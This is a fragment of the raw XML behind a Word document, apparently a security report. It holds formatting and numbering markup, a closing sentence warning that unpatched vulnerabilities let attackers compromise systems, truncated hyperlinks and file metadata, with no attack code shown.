        <w:t>exploit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execution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demonstrated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how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attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>compromise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systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if vulnerabilities are not patched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DAD6C" w14:textId="0C087ECE" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2" w:rsidP="00ED13DB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="136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705"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="331E5E3A"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1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2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1288" w:hanging="840"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1288" w:hanging="8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1A3577"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8AE024C2"/>
    <w:lvl w:ilvl="0" w:tplc="712C050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18AA1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5380DC5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A31AA03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218E9DB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3F8083D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8B7C9B1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C0A2A95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A9188D6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784090"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47AC0CC6"/>
    <w:lvl w:ilvl="0" w:tplc="82069CC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A688B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8C8A1AFC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8967C5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9150122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60565F76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CAE441B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92AA011E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3B3E4672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2F199F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="559833D0"/>
    <w:lvl w:ilvl="0" w:tplc="22B0327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C40BA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4E568AF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5683A9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0714C9E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1180D53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693CA87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FF3E85F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86E676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586700"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C4897C2"/>
    <w:lvl w:ilvl="0" w:tplc="6C8A88E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6E83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B27A3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151C1DD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BB3677D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B792E38E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548A96F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AD50830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A8EE38A8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BE24EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="323C8DE0"/>
    <w:lvl w:ilvl="0" w:tplc="458C7954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36AD82">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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9446F0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F7F2C446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313C1DF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560ECF3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02D2B000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 w:tplc="92C2B7E0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8E1E9080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EE0ADB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EA8330E"/>
    <w:lvl w:ilvl="0" w:tplc="2B329DE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4745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CD467C4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1D221BA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CCA44B2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38D6F41C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63FE717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759C4CC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46603DA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8646A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBA8E5AC"/>
    <w:lvl w:ilvl="0" w:tplc="8A265D64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BA396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98EE84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6BB808A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1CFC75E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66123EEE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BD0267F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BE72C07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B0007288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630899"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9A63C34"/>
    <w:lvl w:ilvl="0" w:tplc="FAD20C4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24D42724">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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9835B2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5538C11C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D1A0827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30E80D4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C110F874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 w:tplc="046E521A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22AEE0D6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9879CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8994605E"/>
    <w:lvl w:ilvl="0" w:tplc="55C86C6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18FAC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FA45BE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3D2A06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E67CB96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E2DA67F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09DA727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B51EAC9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8C308188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9416650"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C80E56B2"/>
    <w:lvl w:ilvl="0" w:tplc="5596DED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22922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7BB8E49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D3407F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9C9A33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5B204480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515E129E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78A86A7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3ADC86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9310BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9336034E"/>
    <w:lvl w:ilvl="0" w:tplc="28BAB8A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F6CB7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A09877A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DF6FD2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3356D8A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D688DFC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5F7C70C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1336598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8F6A34E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AF54D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EAA94D8"/>
    <w:lvl w:ilvl="0" w:tplc="C9369B1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BC583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D221D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A44EB3A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5E94BE4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AAA60FB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769A615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A414218A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F59876E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E77F3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65EEEECA"/>
    <w:lvl w:ilvl="0" w:tplc="5F20EBD8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B052F0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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1A8686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66927CF6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73DC327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A9659E6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377259C8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 w:tplc="B4047496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420E634E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792314"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB421714"/>
    <w:lvl w:ilvl="0" w:tplc="A37C6F0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6E7A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41A488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BC6213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D44AA70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A6EC3D8C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99D89A1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C044A2A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496E66E6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855C31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12EA01FC"/>
    <w:lvl w:ilvl="0" w:tplc="968266E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58A92A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0010E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08B681D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378C73B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A426D42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D8386DA0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11B6ED9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063A23A8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A9186E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5C487F4"/>
    <w:lvl w:ilvl="0" w:tplc="33C8F46C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A4684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E803C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94620D0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08FAA5C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77FA11DA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4CE442F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3C7E128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C540DE64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885465"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC8A42C4"/>
    <w:lvl w:ilvl="0" w:tplc="CBF6519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605F5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8E140D1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9EF6E64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75B2933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CD884FE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6B1A3FB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5A8C1A64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DBC8185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860C7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20B63B62"/>
    <w:lvl w:ilvl="0" w:tplc="ADDEB29E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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48115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2" w:tplc="206A045C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 w:tplc="A2C84FA6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4" w:tplc="2730A884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711E2054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85A0EB4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7" w:tplc="8D9643C4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  <w:lvl w:ilvl="8" w:tplc="0A6C53D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CD03283"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F60E2D0A"/>
    <w:lvl w:ilvl="0" w:tplc="49968264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9E5064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5E08A6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34C3474">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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D1FAE316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5" w:tplc="640E0D7A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7A2EA21C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7" w:tplc="9B2C8668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8" w:tplc="DB249FB6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E0C1486"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="166C9272"/>
    <w:lvl w:ilvl="0" w:tplc="832CD502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3A66B240">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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2EDF52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D0A622FA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521086A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102F284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6" w:tplc="502645AA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 w:tplc="D9FC524E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FB3E3298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EBF67F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04C6932C"/>
    <w:lvl w:ilvl="0" w:tplc="ABBA7BFC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6ECA5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14261C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4A8225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1DD4AFC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7EA86EE6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F95AA80C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803AAC2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B60A128C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FC11373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B74EC528"/>
    <w:lvl w:ilvl="0" w:tplc="43DA8868">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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3E118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77E86F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2B0DFEE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51B60F5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6E786C5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EDA2234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8F820460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4B9AD15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50C2900"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37E6EDB4"/>
    <w:lvl w:ilvl="0" w:tplc="95487A8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2C0D9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640EB2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006A61A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E7A65D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91EC870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CC80021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9E46096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F6BE9616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num w:numId="1" w16cid:durableId="1979265519">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1637366926">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1465734739">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1202669256">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="330988905">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="73744108">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="483083938">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="330371808">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="366834215">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1564414103">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="883057509">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1535654887">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="772087949">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1946112260">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="406653281">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="866991153">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1020400549">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="784814439">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="913274749">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2016299707">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="581791102">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1069887684">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1993826713">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="995501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A2"/>
    <w:rsid w:val="002E6967"/>
    <w:rsid w:val="00377F23"/>
    <w:rsid w:val="0061574E"/>
    <w:rsid w:val="006D4B24"/>
    <w:rsid w:val="00700285"/>
    <w:rsid w:val="00ED13DB"/>
    <w:rsid w:val="00EF1DA9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CAD1"/>
  <w15:docId w15:val="{50AF6792-F68A-44C6-B108-D642CD47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296" w:right="29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1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echpanda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o.i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" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://techpand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mail%3Dadmin@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2934</Words>
  <Characters>16724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 Johnson</dc:creator>
  <cp:lastModifiedBy>Vikas Panchal</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-01T20:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-01T20:41:00Z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Word 2021</vt:lpwstr>
  </property>
</Properties>
</file>